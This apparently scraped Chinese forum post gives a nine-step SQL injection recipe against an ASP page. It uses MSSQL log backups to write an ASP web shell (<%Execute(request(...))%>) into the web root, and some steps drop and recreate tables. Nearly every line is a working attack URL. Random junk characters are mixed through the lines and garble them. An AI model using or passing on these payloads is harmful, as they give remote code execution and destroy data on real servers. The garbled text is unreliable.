第一步 q% P6 W- d8 D% G( N: t/ E
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--1 [' ]; A6 W4 \9 w3 D/ F+ ] p
" O8 \# `* O; n: }. V& Q, y第二步: ?4 N" c* R+ i: R6 X7 }3 R* W1 m x! M
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
" k( `' P: h) {/ c9 ^7 L+ k2 t- }9 A/ R, B. ^/ [& s& I
第三步
. X" O) I3 N# Ahttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
& \9 _* }$ L. u- W7 Q8 F. H8 T- _/ @9 a: b0 v% ^- A& ]
第四步
7 q% @" m$ L( T/ S" U. Khttp://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--0 J" u! t( m1 h/ v. @! O9 G1 i+ h
4 n/ E8 o7 _1 M# |5 F第五步
" _3 ?$ E, J5 z! chttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
% G, ?% W' e4 t) K$ }/ J: q& O4 ~0 T% g$ C9 J
第六步5 z" h# L1 y- I3 W
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--1 ?( U" p6 U0 h7 `
/ r, @- N) I" S1 J1 P+ x
第七步
. f% V" a3 z* p& p7 Phttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--) P2 o, Q+ T2 W8 I
8 }7 o' P K! A9 H第八步/ H/ F1 G- k W8 N
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--! {! O+ ?5 g3 Z- J* K# ]8 N* I1 m
$ c6 g3 ], E6 h4 |. |. w& E9 C! M$ p第九步+ [6 a: S+ ?8 r% q
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
6 Q+ O1 r: E/ T$ ` S9 E. J |